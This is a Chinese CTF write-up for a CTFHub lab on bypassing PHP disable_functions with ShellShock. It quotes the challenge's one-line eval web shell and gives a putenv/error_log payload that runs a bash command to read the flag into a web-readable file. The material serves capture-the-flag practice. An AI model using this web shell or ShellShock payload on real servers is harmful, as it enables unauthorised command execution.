web进阶
-web进阶-
题目描述:
利用PHP破壳完成
CTFHub Bypass disable_function —— ShellShock
本环境来源于AntSword-Labs<!DOCTYPE html>
<html>
<head><title>CTFHub Bypass disable_function —— ShellShock</title><meta charset="UTF-8">
</head>
<body>
<h1>CTFHub Bypass disable_function —— ShellShock</h1>
<p>本环境来源于<a href="https://github.com/AntSwordProject/AntSword-Labs">AntSword-Labs</a></p>
</body>
</html>
<?php
@eval($_REQUEST['ant']);
show_source(__FILE__);
?>
蚁剑连接后,发现只能点击网站根目录下的东西,其他的文件以及目录都没有权限,这时可以试试蚁剑的插件,发现有个的模式可以利用
(主要是自己没有直接在虚拟终端试成功,但很多师傅说蚁剑是直接集成了的环境,可以不需要其他操作就只需要在虚拟终端中输命令就行了,所以可能是我自己的操作有问题,大家可以试试直接在虚拟终端上进行命令执行)
然后在使用了后,可以在终端上进行命令执行:
第二种方法:
利用脚本去进行
在编写脚本之前,得先知道个东西,就是在一般情况下,系统里面的shell进程是有严格的权限控制的,但在bash运行过程中,它会调用操作系统的环境变量,所以我们可以通过设置环境变量来执行任意bash命令
putenv("PHP_hack=() { :; }; tac /flag > /var/www/html/hack.php");
error_log("",1,"","");
?>
将这串代码上传到网站目录下,然后访问hack.php,最后查看根目录下的hack.php即可:
tags:
命令模式